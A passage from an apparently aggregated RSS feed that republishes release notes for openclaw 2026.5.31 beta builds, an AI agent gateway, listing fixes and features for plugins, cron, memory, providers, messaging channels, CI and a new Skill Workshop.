<li>Plugins: preserve npm plugin roots after blocked installs, isolate cached tool runtime siblings, and isolate web-provider factory failures so one bad plugin does not poison sibling runtime paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375645088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77237" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77237/hovercard" href="https://github.com/openclaw/openclaw/pull/77237">#77237</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559215204" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88807/hovercard" href="https://github.com/openclaw/openclaw/pull/88807">#88807</a>)</li>
<li>Cron: keep SQLite cron migrations compatible with legacy run-log tables, archived job stores, diagnostic cron names, and legacy one-shot delete-after-run behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554018071" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88285/hovercard" href="https://github.com/openclaw/openclaw/pull/88285">#88285</a>)</li>
<li>Cron: keep update delivery validation scoped, harden restart state, and retire MCP runtimes on isolated cron cleanup.</li>
<li>Memory: serialize QMD update/embed writes per store, preserve phase signals on read errors, and rewrite generated transcript paths on rollover so memory/search state survives concurrent gateway and CLI activity. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259457800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66339/hovercard" href="https://github.com/openclaw/openclaw/issues/66339">#66339</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4510532697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85931" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85931/hovercard" href="https://github.com/openclaw/openclaw/pull/85931">#85931</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Media: allow validated TXT, JSON, YAML, and YML host-local document sends while rejecting binary-disguised text files. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4411236357" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79658" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79658/hovercard" href="https://github.com/openclaw/openclaw/pull/79658">#79658</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simplyclever914/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simplyclever914">@simplyclever914</a>.</li>
<li>Voice calls: migrate legacy call logs through doctor into plugin-state SQLite while keeping malformed or incomplete sources retryable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558509751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88731" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88731/hovercard" href="https://github.com/openclaw/openclaw/pull/88731">#88731</a>)</li>
<li>Providers: bound generated media downloads from OpenAI, Runway, xAI, MiniMax, BytePlus, DashScope-compatible, FAL, OpenRouter, Google, Vydra, and Comfy providers.</li>
<li>Providers: resolve Google defaults to <code>google-generative-ai</code>, register Vertex static catalog rows, align Foundry reasoning metadata, skip DeepSeek V4 thinking params on Foundry fallback, use MiniMax account OAuth endpoints, preserve Copilot Claude 1M capabilities, suppress disabled Ollama reasoning output, keep OpenAI stop-finished tool calls, and avoid replay ids when the Responses store is disabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556082619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/88480/hovercard" href="https://github.com/openclaw/openclaw/issues/88480">#88480</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556466505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88512" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88512/hovercard" href="https://github.com/openclaw/openclaw/pull/88512">#88512</a>)</li>
<li>Providers/OpenAI: avoid orphan Responses message-id replay and sanitize raw HTTP 401 provider errors before they reach user-facing logs.</li>
<li>Providers: cap GitHub Copilot OAuth request timeouts before creating abort signals.</li>
<li>Cron: retry recurring jobs after transient model rate limits before waiting for the next scheduled slot.</li>
<li>Agents/Codex: keep live session locks during cleanup, recover interrupted CLI tool transcripts, preserve Codex auth and compaction session identity, clear orphan tool state, cap app-server idle timers, and keep media completion delivery retryable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Chat/UI: show Gateway chat failures as visible assistant messages in the Control UI instead of only setting an invisible error state.</li>
<li>Channels: recover failed progress-draft starts and refresh just-started progress drafts across Discord, Telegram, Slack, Matrix, and Teams instead of losing early progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463729976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83115/hovercard" href="https://github.com/openclaw/openclaw/issues/83115">#83115</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558636505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88749" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88749/hovercard" href="https://github.com/openclaw/openclaw/pull/88749">#88749</a>)</li>
<li>Discord: bound REST entity cache growth and keep recovered tool warning output mention-inert.</li>
<li>Channels: cap Telegram, Discord, WhatsApp, Signal, Feishu, Google Chat, Microsoft Teams, QQBot, Nostr, Zalo, Zalouser, and Nextcloud-style request/retry timers; preserve SMS approval reply routes; and retry WhatsApp QR login 408 timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>)</li>
<li>Security/config parsing: reject unsafe OAuth/token lifetimes, retry-after delays, inbound timestamps, response body sizes, command timeout config, sandbox observer token TTLs, and gateway WebSocket calls after close.</li>
<li>Gateway/security: rate-limit bootstrap-token verification, guard direct session display names, and add Tailscale Serve service-name support without weakening gateway exposure checks.</li>
<li>Providers/media: cap local service, model, usage, queue, generated media, TTS, music, workflow polling, and provider OAuth request timers across hosted and local providers.</li>
<li>Plugins/install: add npm README coverage for channel providers and pin WhatsApp media decoding to Baileys' supported peer range so external WhatsApp installs do not fail npm peer resolution.</li>
<li>Release/CI/E2E: bound release candidate reads, beta smoke REST calls, changelog restore, kitchen-sink and bundled plugin readiness probes, secret-provider probes, Vitest routing, and mainline test flakes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551354671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88127" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88127/hovercard" href="https://github.com/openclaw/openclaw/pull/88127">#88127</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551653681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88137" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88137/hovercard" href="https://github.com/openclaw/openclaw/pull/88137">#88137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552032597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88155" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88155/hovercard" href="https://github.com/openclaw/openclaw/pull/88155">#88155</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552192113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88160/hovercard" href="https://github.com/openclaw/openclaw/pull/88160">#88160</a>)</li>
<li>Release/CI/E2E: refresh pinned Node Docker image digests and keep pairing challenge assertions aligned with fenced approval commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495421361" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84981" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84981/hovercard" href="https://github.com/openclaw/openclaw/issues/84981">#84981</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495608523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84988" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84988/hovercard" href="https://github.com/openclaw/openclaw/pull/84988">#84988</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LibraHo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LibraHo">@LibraHo</a>.</li>
<li>Release/CI/E2E: run the secret-provider integration proof through the repo pnpm runner so native macOS and Windows validation use the hydrated package-manager shim.</li>
<li>Release/CI/E2E: run the Telegram desktop proof gateway through the repo pnpm runner so native macOS proof uses the hydrated package-manager shim.</li>
<li>Docs/CI: run Mintlify anchor checks through the repo pnpm runner so docs link validation works when pnpm is only available through the hydrated package-manager shim.</li>
<li>Agents: keep configured fallback model metadata typed so provider params, context-token caps, and media input limits do not break changed-gate typechecks.</li>
<li>Agents: accept hidden <code>sessions_send</code> body aliases before validation while keeping the model-facing <code>message</code> schema canonical. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553200827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88229" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88229/hovercard" href="https://github.com/openclaw/openclaw/pull/88229">#88229</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Chat/UI: preserve startup chat sends during history loading, unblock the initial Control UI chat send, stream chat deltas incrementally, skip markdown parsing while streaming, honor Chromium executable overrides, and detect system Chromium for E2E.</li>
<li>Channels: preserve long Feishu streaming replies, send visible fallbacks when accepted Feishu turns produce no final reply, tolerate iMessage self-chat timestamp skew, decode Nostr <code>npub</code> allowlists correctly, and suppress raw provider errors during channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545822590" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87896" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87896/hovercard" href="https://github.com/openclaw/openclaw/pull/87896">#87896</a>)</li>
<li>Config/status/doctor: skip unresolved shell references in state-dir dotenv files, resolve gateway auth secrets during deep status audits, respect explicit PI runtime policy, report runtime tool-schema errors, and keep post-upgrade JSON stable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554055557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88288/hovercard" href="https://github.com/openclaw/openclaw/pull/88288">#88288</a>)</li>
<li>Gateway/session state: list commands from the Gateway plugin registry, harden MCP loopback tool schemas, hide phantom agent-store rows from <code>sessions.list</code>, make task persistence failures explicit, and carry session UUIDs on interactive dispatch events.</li>
<li>OpenAI/TTS: handle speed directives for OpenAI TTS voices. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348062227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74089" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74089/hovercard" href="https://github.com/openclaw/openclaw/pull/74089">#74089</a>)</li>
<li>CI/Crabbox: keep default runner capacity on the Azure credit-backed on-demand D4 lane with the Azure SSH port and a Git-independent full check job, so broad validation avoids low-priority spot quota stalls, hydrate port mismatches, non-Git hydrated workspaces, and stale AWS region hints.</li>
<li>CI/Crabbox: route Crabbox wrapper and Testbox workflow edits to their regression tests so changed-test gates do not silently run zero specs.</li>
<li>CI/workflows: route workflow sanity helper edits to their guard tests and cover composite-action input interpolation checks.</li>
<li>CI/tooling: route CI scope, dependency, changelog, and docs helper edits to their owner tests instead of silently skipping changed-test coverage.</li>
<li>CI/tooling: route package, release, and install helper edits to their owner tests so changed-test gates cover publish and installer script changes.</li>
<li>CI/tooling: route shared script library edits through their owner tests so lock, process, safety, and scan helpers do not skip changed-test coverage.</li>
<li>CI/tooling: skip expensive import-graph scans once a changed diff already requires broad fallback, keeping local changed-test planning fast while still collecting explicit owner tests.</li>
<li>CI/tooling: route script edits through conventional owner tests when matching <code>test/scripts</code> or <code>src/scripts</code> coverage already exists.</li>
<li>CI/tooling: honor option terminators in the memory FD repro script so follow-on arguments are not reparsed.</li>
<li>Release/CI/E2E: assert plugin lifecycle runtime inspect output instead of only capturing it.</li>
<li>Release/CI/E2E: make gateway-network prove the advertised health RPC and retry early WebSocket closes without burning full open timeouts.</li>
<li>Release/CI/E2E: honor option terminators across release, Parallels smoke, plugin gauntlet, and extension-memory scripts.</li>
<li>Release/CI/E2E: fail plugin gateway gauntlet QA chunks when the requested suite summary is missing or invalid.</li>
<li>Performance: prebuild QA runtime probes with generated plugin assets but without CLI startup metadata.</li>
<li>Performance: skip declaration bundling for runtime-only CLI startup and gateway watch build profiles.</li>
<li>Performance: reuse prepared provider handles, strict tool schemas, gateway runtime metadata, session maintenance config, plugin metadata, bundled skill allowlists, package-local plugin artifacts, single-entry store writes, and validated/serialized session prompt blobs.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.31-beta.3]]></title>
<description><![CDATA[2026.5.31
Highlights

Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (#88129, #88136, #88141, #88162, #88182)
Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, S...]]></description>
<link>https://tsecurity.de/de/3561316/downloads/openclaw-2026531-beta3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561316/downloads/openclaw-2026531-beta3/</guid>
<pubDate>Sun, 31 May 2026 21:31:14 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.31</h2>
<h3>Highlights</h3>
<ul>
<li>Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, Slack, Discord, Microsoft Teams, Google Chat, Google Meet, and iOS realtime Talk. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>Gateway and channel setup add Tailscale Serve service-name binding, Communication notification settings, safer <code>agents add</code>, and more reliable progress drafts across Discord, Telegram, Slack, Matrix, and Teams. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354639496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74715/hovercard" href="https://github.com/openclaw/openclaw/pull/74715">#74715</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463729976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83115/hovercard" href="https://github.com/openclaw/openclaw/issues/83115">#83115</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554276259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88314" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88314/hovercard" href="https://github.com/openclaw/openclaw/pull/88314">#88314</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558636505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88749" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88749/hovercard" href="https://github.com/openclaw/openclaw/pull/88749">#88749</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VladyslavLevchuk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VladyslavLevchuk">@VladyslavLevchuk</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Provider and plugin requests now bound more timers, retries, OAuth/device-code lifetimes, media downloads, local service probes, and generated-content polling paths before they can hang a run.</li>
<li>Skills, session metadata, gateway runtime state, plugin metadata, and store writes do less repeated work on hot paths while keeping config and dispatch behavior stable.</li>
<li>Skills and plugin loading now handle stale disabled snapshots and loader failures more clearly, so channel turns avoid disabled SecretRefs and operators get better recovery guidance. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4401582392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79072" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/79072/hovercard" href="https://github.com/openclaw/openclaw/issues/79072">#79072</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4403061400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79173/hovercard" href="https://github.com/openclaw/openclaw/pull/79173">#79173</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeus1959/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeus1959">@zeus1959</a>.</li>
<li>Workboard, SecretRef plugin manifests, hosted iOS push relay, and external Copilot/Tokenjuice packaging add broader orchestration, integration, and plugin delivery surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544177368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87796" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87796/hovercard" href="https://github.com/openclaw/openclaw/pull/87796">#87796</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550878888" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88107" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88107/hovercard" href="https://github.com/openclaw/openclaw/pull/88107">#88107</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Release, CI, Docker, E2E, and diagnostics lanes now cap more logs, response bodies, readiness probes, artifact checks, and status polling so failures report bounded proof instead of stalling.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Docs: add a dedicated Skill Workshop guide covering governed skill creation, reviewable proposals, CLI, Gateway, agent tool behavior, approval policy, support files, and recovery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let the <code>skill_workshop</code> agent tool apply, reject, and quarantine explicit proposals through the guarded review flow. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let proposals carry approved support files under standard skill folders, with scanner, hash, and rollback safeguards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let pending proposals be revised in place with versioned, dated proposal frontmatter before approval. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: add Skill Workshop with pending proposals, CLI/Gateway review actions, rollback metadata, and the <code>skill_workshop</code> agent tool. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins: externalize Tokenjuice as the official <code>@openclaw/tokenjuice</code> plugin with npm and ClawHub publish metadata.</li>
<li>Plugins: externalize the GitHub Copilot agent runtime as the official <code>@openclaw/copilot</code> plugin with npm and ClawHub publish metadata.</li>
<li>iOS: add hosted push relay defaults, realtime Talk playback, and a guarded WebSocket ping path for more reliable mobile sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>Workboard: add orchestration primitives and agent coordination tools for multi-agent planning and run tracking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>)</li>
<li>Gateway: support Tailscale Serve service-name bindings for gateway exposure and status.</li>
<li>Code mode: add internal namespaces for scoped agent/global sessions and exact namespace tool dispatch. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549263089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88043" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88043/hovercard" href="https://github.com/openclaw/openclaw/pull/88043">#88043</a>)</li>
<li>Control UI: add a Dreaming-tab agent selector and propagate the selected agent through Dreaming status, diary, and diary actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4395906736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78748/hovercard" href="https://github.com/openclaw/openclaw/pull/78748">#78748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stevenepalmer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stevenepalmer">@stevenepalmer</a>.</li>
<li>Control UI: expose the Communication Notifications settings tab so notification controls are reachable from settings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354639496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74715/hovercard" href="https://github.com/openclaw/openclaw/pull/74715">#74715</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VladyslavLevchuk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VladyslavLevchuk">@VladyslavLevchuk</a>.</li>
<li>Plugin SDK/channels: add typed presentation command actions so native slash-command and callback controls can round-trip through capable channel plugins without being reinterpreted. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558368986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88721/hovercard" href="https://github.com/openclaw/openclaw/pull/88721">#88721</a>)</li>
